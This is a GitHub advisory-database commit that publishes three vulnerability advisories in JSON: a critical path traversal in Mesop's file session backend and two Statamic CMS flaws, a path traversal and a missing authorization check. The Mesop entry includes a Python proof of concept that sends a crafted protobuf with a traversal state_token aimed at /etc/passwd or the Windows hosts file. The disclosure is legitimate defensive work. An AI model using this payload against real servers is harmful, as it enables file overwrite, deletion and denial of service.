Skip to content

Commit c0a8e74

Browse files
advisory-database[bot]advisory-database[bot]
committed
Publish Advisories
GHSA-8qvf-mr4w-9x2c GHSA-qm7r-wwq7-6f85 GHSA-wh3h-gvc4-cc2g
1 parent 4e270e7 commit c0a8e74

3 files changed

Lines changed: 212 additions & 0 deletions

File tree

advisories/github-reviewed/2026/03/GHSA-8qvf-mr4w-9x2c/GHSA-8qvf-mr4w-9x2c.json

Lines changed: 60 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,60 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-8qvf-mr4w-9x2c",
4+
"modified": "2026-03-18T20:01:21Z",
5+
"published": "2026-03-18T20:01:21Z",
6+
"aliases": [
7+
"CVE-2026-33054"
8+
],
9+
"summary": "Mesop has a Path Traversal utilizing `FileStateSessionBackend` leads to Application Denial of Service and File Write/Deletion",
10+
"details": "#### Summary\nA Path Traversal vulnerability allows any user (or attacker) supplying an untrusted `state_token` through the UI stream payload to arbitrarily target files on the disk under the standard file-based runtime backend. This can result in application denial of service (via crash loops when reading non-msgpack target files as configurations), or arbitrary file manipulation.\n\n#### Details\nWhen the framework is configured to use the disk-based session backend (`FileStateSessionBackend`), the user's `state_token` actively dictates where the runtime session state is physically saved or queried natively on disk. \nIn `mesop/server/server.py`, specifically the `ui_stream` endpoint, the `event.state_token` is collected directly from the untrusted incoming protobuf message struct: `mesop.protos.ui_pb2.UserEvent`.\nBecause this is unconditionally passed to `FileStateSessionBackend._make_file_path(self, token)`, it evaluates standard path operators (e.g. `../../../`). \n\n```python\n# mesop/server/state_session.py\n def _make_file_path(self, token: str) -> Path:\n return self.base_dir / (self.prefix + token)\n```\nPython's standard library natively resolves OS traversal semantics allowing full escape from the `base_dir` destination intent.\n\n#### PoC\nAn attacker can utilize Python to craft and send a malicious Protobuf payload to the `/ui` stream.\n\n```python\nimport requests\nimport mesop.protos.ui_pb2 as pb # Assuming mesop protos are compiled\n\n# 1. Craft the malicious protobuf message\nuser_event = pb.UserEvent()\n# Escaping the tmp directory via path traversal to target a sensitive file, e.g., the root crontab or a system file\nuser_event.state_token = \"../../../../etc/passwd\" \n\n# Alternatively, targeting Windows:\n# user_event.state_token = \"..\\\\..\\\\..\\\\..\\\\Windows\\\\System32\\\\drivers\\\\etc\\\\hosts\"\n\nserialized_event = user_event.SerializeToString()\n\n# 2. Send the message to the ui stream endpoint\nheaders = {'Content-Type': 'application/x-protobuf'}\nresponse = requests.post(\n \"http://localhost:32123/ui\",\n data=serialized_event,\n headers=headers\n)\n\n# The server will attempt to parse /etc/passwd using msgpack, \n# resulting in a crash or reading/overwriting operations depending on the request type invoked.\nprint(response.content)\n```\n\n#### Impact\nThis vulnerability heavily exposes systems hosted utilizing `FileStateSessionBackend`. Unauthorized malicious actors could interact with arbitrary payloads overwriting or explicitly removing underlying service resources natively outside the application bounds.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "PyPI",
21+
"name": "mesop"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "0"
29+
},
30+
{
31+
"fixed": "1.2.3"
32+
}
33+
]
34+
}
35+
],
36+
"database_specific": {
37+
"last_known_affected_version_range": "<= 1.2.2"
38+
}
39+
}
40+
],
41+
"references": [
42+
{
43+
"type": "WEB",
44+
"url": "https://github.com/mesop-dev/mesop/security/advisories/GHSA-8qvf-mr4w-9x2c"
45+
},
46+
{
47+
"type": "PACKAGE",
48+
"url": "https://github.com/mesop-dev/mesop"
49+
}
50+
],
51+
"database_specific": {
52+
"cwe_ids": [
53+
"CWE-22"
54+
],
55+
"severity": "CRITICAL",
56+
"github_reviewed": true,
57+
"github_reviewed_at": "2026-03-18T20:01:21Z",
58+
"nvd_published_at": null
59+
}
60+
}

advisories/github-reviewed/2026/03/GHSA-qm7r-wwq7-6f85/GHSA-qm7r-wwq7-6f85.json

Lines changed: 76 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,76 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-qm7r-wwq7-6f85",
4+
"modified": "2026-03-18T20:00:42Z",
5+
"published": "2026-03-18T20:00:42Z",
6+
"aliases": [
7+
"CVE-2026-33171"
8+
],
9+
"summary": "Statamic has a path traversal in file dictionary fieldtype",
10+
"details": "### Impact\n\nAuthenticated Control Panel users could read arbitrary `.json`, `.yaml`, and `.csv` files from the server by manipulating the file dictionary's `filename` configuration parameter in the fieldtype's endpoint.\n\n### Patches\n\nThis has been fixed in 5.73.14 and 6.7.0.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "statamic/cms"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "6.0.0-alpha.1"
29+
},
30+
{
31+
"fixed": "6.7.0"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "Packagist",
40+
"name": "statamic/cms"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "0"
48+
},
49+
{
50+
"fixed": "5.73.14"
51+
}
52+
]
53+
}
54+
]
55+
}
56+
],
57+
"references": [
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/statamic/cms/security/advisories/GHSA-qm7r-wwq7-6f85"
61+
},
62+
{
63+
"type": "PACKAGE",
64+
"url": "https://github.com/statamic/cms"
65+
}
66+
],
67+
"database_specific": {
68+
"cwe_ids": [
69+
"CWE-22"
70+
],
71+
"severity": "MODERATE",
72+
"github_reviewed": true,
73+
"github_reviewed_at": "2026-03-18T20:00:42Z",
74+
"nvd_published_at": null
75+
}
76+
}

advisories/github-reviewed/2026/03/GHSA-wh3h-gvc4-cc2g/GHSA-wh3h-gvc4-cc2g.json

Lines changed: 76 additions & 0 deletions
Original file line numberDiff line numberDiff line change
@@ -0,0 +1,76 @@
1+
{
2+
"schema_version": "1.4.0",
3+
"id": "GHSA-wh3h-gvc4-cc2g",
4+
"modified": "2026-03-18T20:00:51Z",
5+
"published": "2026-03-18T20:00:51Z",
6+
"aliases": [
7+
"CVE-2026-33177"
8+
],
9+
"summary": "Statamic is missing authorization check on taxonomy term creation via fieldtype",
10+
"details": "### Impact\n\nLow-privileged Control Panel users could create taxonomy terms by submitting requests to the field action processing endpoint with attacker-controlled field definitions. This bypasses the authorization checks enforced on the standard taxonomy term creation endpoint.\n\n### Patches\n\nThis has been fixed in 5.73.14 and 6.7.0.",
11+
"severity": [
12+
{
13+
"type": "CVSS_V3",
14+
"score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:L/A:N"
15+
}
16+
],
17+
"affected": [
18+
{
19+
"package": {
20+
"ecosystem": "Packagist",
21+
"name": "statamic/cms"
22+
},
23+
"ranges": [
24+
{
25+
"type": "ECOSYSTEM",
26+
"events": [
27+
{
28+
"introduced": "6.0.0-alpha.1"
29+
},
30+
{
31+
"fixed": "6.7.0"
32+
}
33+
]
34+
}
35+
]
36+
},
37+
{
38+
"package": {
39+
"ecosystem": "Packagist",
40+
"name": "statamic/cms"
41+
},
42+
"ranges": [
43+
{
44+
"type": "ECOSYSTEM",
45+
"events": [
46+
{
47+
"introduced": "0"
48+
},
49+
{
50+
"fixed": "5.73.14"
51+
}
52+
]
53+
}
54+
]
55+
}
56+
],
57+
"references": [
58+
{
59+
"type": "WEB",
60+
"url": "https://github.com/statamic/cms/security/advisories/GHSA-wh3h-gvc4-cc2g"
61+
},
62+
{
63+
"type": "PACKAGE",
64+
"url": "https://github.com/statamic/cms"
65+
}
66+
],
67+
"database_specific": {
68+
"cwe_ids": [
69+
"CWE-862"
70+
],
71+
"severity": "MODERATE",
72+
"github_reviewed": true,
73+
"github_reviewed_at": "2026-03-18T20:00:51Z",
74+
"nvd_published_at": null
75+
}
76+
}

0 commit comments

Comments
 (0)